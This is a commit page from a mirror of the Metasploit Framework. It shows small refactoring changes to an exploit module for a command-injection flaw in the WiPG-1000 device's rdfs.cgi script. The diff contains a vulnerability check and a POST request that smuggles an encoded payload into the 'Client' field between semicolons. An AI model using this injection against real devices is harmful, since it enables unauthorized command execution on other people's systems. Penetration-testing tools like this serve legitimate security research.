infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #8288, Minor changes to WiPG-1000 module

bug/bundler_fix
wchen-r7 2017-04-24 17:09:25 -05:00
parent c573628e10 e333cb65e5
commit 1d86905fca
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 5 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/linux/http/wipg1000_cmd_injection.rb
View File

@ -50,12 +50,12 @@ class MetasploitModule < Msf::Exploit::Remote
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/cgi-bin/rdfs.cgi')
'uri' => '/cgi-bin/rdfs.cgi'
})
if res and res.body =~ /Follow administrator instructions to enter the complete path/ then
return Exploit::CheckCode::Appears
if res && res.body.include?("Follow administrator instructions to enter the complete path")
Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
Exploit::CheckCode::Safe
end
end
@ -63,7 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Sending request')
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri('/cgi-bin/rdfs.cgi'),
'uri' => '/cgi-bin/rdfs.cgi',
'vars_post' => {
'Client' => ";#{payload.encoded};",
'Download' => 'Download'